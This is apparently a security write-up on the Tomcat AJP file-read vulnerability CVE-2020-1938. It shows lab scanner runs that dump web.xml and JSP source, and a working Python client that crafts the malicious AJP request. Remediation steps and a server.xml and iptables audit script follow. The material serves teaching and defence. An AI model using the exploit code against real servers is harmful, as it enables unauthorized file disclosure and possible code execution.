Tomcat AJP protocol file read vulnerability (CVE-2020-1938)
Overview: through Tomcat's AJP connector (port 8009) an attacker can read any file under a deployed web application's root, including files that are never served over HTTP such as /WEB-INF/web.xml. If the attacker can also place a file inside the webapp (for example through an upload feature), the same request makes Tomcat compile and execute that file as a JSP.
Tools: CVE-2020-1938TomcatAjpScanner.py (the bundled ajpShooter.py is used as well), a Tomcat installation, and a web application deployed on it.
1. Reproducing the vulnerability:
Run the scanner against the target host. It connects to 8009, requests WEB-INF/web.xml of the configured context (/woaiqiukui here) and prints the file as a Python bytes literal; the \r\n sequences are expanded below for readability, and the output is truncated where the original was.

python3 CVE-2020-1938TomcatAjpScanner.py 192.168.93.146

['192.168.93.146']
/woaiqiukui
Checking IP #1
Getting resource at ajp13://192.168.93.146:8009/woaiqiukuitest
----------------------------
[+] ip:192.168.93.146 is vulnerable to the Tomcat AJP bug
[+] start reading WEB_INF/web.xml:
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">
 <filter>
 <filter-name>EncodingFilter</filter-name>
 <filter-class>msl.web.filter.EncodingFilter</filter-class>
 </filter>
 <filter-mapping>
 <filter-name>EncodingFilter</filter-name>
 <url-pattern>/*</url-pattern>
 </filter-mapping>
 <servlet>
 <description></description>
 <display-name>BaseServlet</display-name>
 <servlet-name>BaseServlet</servlet-name>
 <servlet-class>msl.web.servlet.BaseServlet</servlet-class>
 </servlet>
 <servlet-mapping>
 <servlet-name>BaseServlet</servlet-name>
 <url-pattern>/base</url-pattern>
 </servlet-mapping>
 <error-page>
 <error-code>500</error-code>
 <location>/500.jsp</location>
 </error-page>
 <error-page>
 <error-code>404</error-code>
 <location>/404.html</location>
 </error-page>
 <error-page>
 	<error-code>400</error-code>
 	<location>/400.jsp</location
The same bug can be used to pull JSP source. ajpShooter.py takes the site URL (to learn the host name and context), the AJP port, the file path relative to the webapp root and an action; the read action returns the file verbatim, while the eval action has Tomcat process it as a JSP. The file returned below is truncated where the original output was.

root@kali:~/Desktop/poc/CVE-2020-1938TomcatAjpScanner-master# python3 ajpShooter.py http://192.168.93.146:8080/ 8009 /jsp/index.jsp read

(ajpShooter banner: 00theway, just for test)

[<] 200 OK
[<] Set-Cookie: JSESSIONID=240A76CB98811D9E670C32AC3637636A; Path=/; HttpOnly
[<] Accept-Ranges: bytes
[<] ETag: W/"6815-1584381598000"
[<] Last-Modified: Mon, 16 Mar 2020 17:59:58 GMT
[<] Content-Type: text/html;charset=utf-8
[<] Content-Length: 6815

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%@taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
<%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions" %>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>WEB01</title>
<link rel="stylesheet" href="${pageContext.request.contextPath}/css/bootstrap.min.css" type="text/css" />
<script src="${pageContext.request.contextPath}/js/jquery-1.11.3.min.js" type="text/javascript"></script>
<script src="${pageContext.request.contextPath}/js/bootstrap.min.js" type="text/javascript"></script>
</head>
<body>
<div class="container-fluid">
<!-- 静态包含 -->
<%@include file="/jsp/head.jsp" %>
In Tomcat releases before the fix (9.0.31, 8.5.51 and 7.0.100) the default server.xml ships with the AJP connector enabled on port 8009, bound to all interfaces and with no client authentication. If the host firewall also allows inbound 8009, anyone who can reach the port can exploit this vulnerability; the AJP protocol itself has no authentication, and Tomcat trusts the request attributes the AJP client sends. The default entry looks like this:
<!-- Define an AJP 1.3 Connector on port 8009 -->
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
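To make the scanner output above concrete, here is an added example (not code from the original post, nor from CVE-2020-1938TomcatAjpScanner or ajpShooter) that builds the AJP13 forward request by hand, decodes the container's reply, and shows the three javax.servlet.include.* request attributes that pre-fix Tomcat accepted from any AJP client. The target host, ports, context path, file name and the sample reply are assumed or constructed for the example; only read_file() talks to a real connector and needs network access.

```python
import socket
import struct

# AJP13 prefixes/codes from the AJPv13 protocol reference.
FORWARD_REQUEST, METHOD_GET = 0x02, 0x02                         # client -> container
SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE = 0x03, 0x04, 0x05   # container -> client
REQ_ATTRIBUTE, ATTR_END = 0x0A, 0xFF                             # generic attribute, list end
RESPONSE_HEADER_CODES = {                       # header names Tomcat may send as 2-byte codes
    0xA001: "Content-Type", 0xA002: "Content-Language", 0xA003: "Content-Length",
    0xA004: "Date", 0xA005: "Last-Modified", 0xA006: "Location", 0xA007: "Set-Cookie",
    0xA008: "Set-Cookie2", 0xA009: "Servlet-Engine", 0xA00A: "Status", 0xA00B: "WWW-Authenticate"}


def ajp_string(s):
    """Encode an AJP string: 2-byte length, bytes, NUL; None encodes as 0xFFFF."""
    if s is None:
        return b"\xff\xff"
    data = s.encode()
    return struct.pack(">H", len(data)) + data + b"\x00"


def build_ghostcat_request(server_name, server_port, target_file, uri="/xxx"):
    """Build the FORWARD_REQUEST that makes a vulnerable Tomcat return target_file.

    target_file is relative to the webapp root (e.g. "WEB-INF/web.xml"). uri must
    start with that webapp's context path ("/" for ROOT, "/woaiqiukui/..." for the
    post's target); give it a .jsp suffix to have JspServlet compile and run the
    target instead of DefaultServlet returning it raw.
    """
    body = bytes([FORWARD_REQUEST, METHOD_GET])
    body += ajp_string("HTTP/1.1") + ajp_string(uri)
    body += ajp_string("127.0.0.1")                # remote_addr as the servlet will see it
    body += ajp_string(None)                       # remote_host (null)
    body += ajp_string(server_name)                # server_name
    body += struct.pack(">H", server_port)         # server_port
    body += b"\x00"                                # is_ssl = false
    body += struct.pack(">H", 1)                   # num_headers
    body += b"\xa0\x0b" + ajp_string(server_name)  # 0xA00B = Host header code
    # Pre-fix Tomcat copied every req_attribute into the request unfiltered, so
    # DefaultServlet treats path_info as a RequestDispatcher.include() target.
    for name, value in (("javax.servlet.include.request_uri", "/"),
                        ("javax.servlet.include.path_info", target_file),
                        ("javax.servlet.include.servlet_path", "/")):
        body += bytes([REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    body += bytes([ATTR_END])
    return b"\x12\x34" + struct.pack(">H", len(body)) + body  # client magic + length


def _read_string(buf, pos):
    (length,) = struct.unpack_from(">H", buf, pos)
    if length == 0xFFFF:
        return None, pos + 2
    return buf[pos + 2:pos + 2 + length].decode("utf-8", "replace"), pos + 3 + length


def parse_ajp_response(data):
    """Decode container -> client packets (magic 'AB'); returns (status, headers, body)."""
    status, headers, body, pos = None, {}, b"", 0
    while pos + 4 <= len(data):
        if data[pos:pos + 2] != b"AB":
            raise ValueError("bad AJP magic at offset %d" % pos)
        (length,) = struct.unpack_from(">H", data, pos + 2)
        pkt, pos = data[pos + 4:pos + 4 + length], pos + 4 + length
        if pkt[0] == SEND_HEADERS:
            (status,) = struct.unpack_from(">H", pkt, 1)
            _, p = _read_string(pkt, 3)                       # status message, ignored
            (count,), p = struct.unpack_from(">H", pkt, p), p + 2
            for _ in range(count):
                code = struct.unpack_from(">H", pkt, p)[0]
                if code in RESPONSE_HEADER_CODES:             # coded name
                    name, p = RESPONSE_HEADER_CODES[code], p + 2
                else:                                         # literal name (code is length)
                    name, p = _read_string(pkt, p)
                value, p = _read_string(pkt, p)
                headers[name] = value
        elif pkt[0] == SEND_BODY_CHUNK:
            (n,) = struct.unpack_from(">H", pkt, 1)
            body += pkt[3:3 + n]
        elif pkt[0] == END_RESPONSE:
            break
    return status, headers, body


def read_file(server_name, target_file, ajp_port=8009, http_port=8080, timeout=5):
    """Send the request to a live connector and decode the reply (needs network)."""
    request = build_ghostcat_request(server_name, http_port, target_file)
    with socket.create_connection((server_name, ajp_port), timeout=timeout) as sock:
        sock.sendall(request)
        raw = b""
        while b"AB\x00\x02\x05" not in raw:       # stop once END_RESPONSE has arrived
            chunk = sock.recv(65536)
            if not chunk:
                break
            raw += chunk
    return parse_ajp_response(raw)


def sample_response():
    """Constructed reply (not a capture): 200 OK, two headers, one body chunk."""
    content = b'<?xml version="1.0"?><web-app/>'
    hdrs = bytes([SEND_HEADERS]) + struct.pack(">H", 200) + ajp_string("OK")
    hdrs += struct.pack(">H", 2) + b"\xa0\x01" + ajp_string("application/xml")
    hdrs += ajp_string("X-Example") + ajp_string("constructed")
    chunk = bytes([SEND_BODY_CHUNK]) + struct.pack(">H", len(content)) + content + b"\x00"
    end = bytes([END_RESPONSE, 1])
    return b"".join(b"AB" + struct.pack(">H", len(p)) + p for p in (hdrs, chunk, end))
```

Against the post's lab, read_file("192.168.93.146", "WEB-INF/web.xml") with uri="/woaiqiukui/xxx" reproduces the scanner's first step. The fix in Tomcat 9.0.31 / 8.5.51 / 7.0.100 rejects these attributes unless allowedRequestAttributesPattern matches them, and, with secretRequired, refuses forward requests that do not carry the configured secret attribute.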
2. Remediation
Comment out the AJP Connector in server.xml shown above and restart Tomcat, or block port 8009 at the firewall. If the connector is genuinely needed (a front-end Apache httpd with mod_jk or mod_proxy_ajp, for instance), upgrade to 9.0.31, 8.5.51 or 7.0.100 or later, bind it to the interface the proxy uses with address="...", and set secretRequired="true" secret="..." with the same secret configured on the proxy side. The commented-out entry looks like this:
<!-- Define an AJP 1.3 Connector on port 8009 -->
<!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> -->
Re-testing after the change confirms the fix: the scanner can no longer connect to the AJP port.
root@kali:~/Desktop/poc/CVE-2020-1938TomcatAjpScanner-master# python3 CVE-2020-1938TomcatAjpScanner.py 192.168.93.146

['192.168.93.146']
/woaiqiukui
Checking IP #1
[Errno 111] Connection refused
Getting resource at ajp13://192.168.93.146:8009/woaiqiukuitest
[-] Test ip:192.168.93.146/woaiqiukuitest, [Errno 32] Broken pipe, unable to connect; the AJP port is probably closed
[Errno 32] Broken pipe
Firewall configuration: delete the 8009 rule from /etc/sysconfig/iptables and reload the firewall with service iptables restart (the SysV-style service used on CentOS 6 and similar). The rule to remove is:
-A INPUT -p tcp -m tcp --dport 8009 -j ACCEPT
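A small audit script for the two remediation steps above, added here as an example and not part of the original post or of any Tomcat tooling: it walks server.xml for AJP connectors that are still reachable without a secret, and checks an iptables-save dump for an INPUT rule that accepts port 8009. The two server.xml fragments are constructed for the example; the hardened one uses the address, secretRequired and secret attributes that fixed Tomcat releases support.

```python
import re
import xml.etree.ElementTree as ET

# Constructed server.xml fragments (not copied from a real host). The second one
# keeps the original connector commented out and adds a loopback-bound,
# secret-protected replacement, as a proxy-fronted deployment would.
VULNERABLE_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <!-- Define an AJP 1.3 Connector on port 8009 -->
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>"""

HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> -->
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="replace-with-a-long-random-value" />
  </Service>
</Server>"""


def audit_ajp_connectors(server_xml):
    """Return one finding dict per AJP connector that Tomcat would actually start.

    Commented-out connectors are dropped by the XML parser, exactly as Tomcat
    ignores them. A connector is reported clean only if it binds to loopback and
    carries a secret; an absent address attribute means "all interfaces".
    """
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if not conn.get("protocol", "HTTP/1.1").upper().startswith("AJP"):
            continue
        address = conn.get("address", "0.0.0.0")
        issues = []
        if address not in ("127.0.0.1", "::1", "localhost"):
            issues.append("bound to %s, reachable from the network" % address)
        if not conn.get("secret"):
            issues.append("no AJP secret configured; any client that reaches the port is trusted")
        if conn.get("secretRequired", "true").lower() != "true":
            issues.append("secretRequired explicitly disabled")
        findings.append({"port": conn.get("port", "8009"), "address": address, "issues": issues})
    return findings


def iptables_exposes_ajp(rules_text, port=8009):
    """True if an INPUT rule in iptables-save output accepts TCP to `port`."""
    pattern = re.compile(r"^-A INPUT\b.*-p tcp\b.*--dport %d\b.*-j ACCEPT" % port)
    return any(pattern.search(line.strip()) for line in rules_text.splitlines())


if __name__ == "__main__":
    for label, xml_text in (("before", VULNERABLE_SERVER_XML), ("after", HARDENED_SERVER_XML)):
        for finding in audit_ajp_connectors(xml_text):
            print(label, finding)
    print("iptables accepts 8009:", iptables_exposes_ajp("-A INPUT -p tcp -m tcp --dport 8009 -j ACCEPT"))
```

On a real host run audit_ajp_connectors(open("/path/to/conf/server.xml").read()) and iptables_exposes_ajp(subprocess.check_output(["iptables-save"]).decode()); both steps in the post (commenting out the connector and deleting the iptables rule) should leave the audit with no findings and the iptables check returning False.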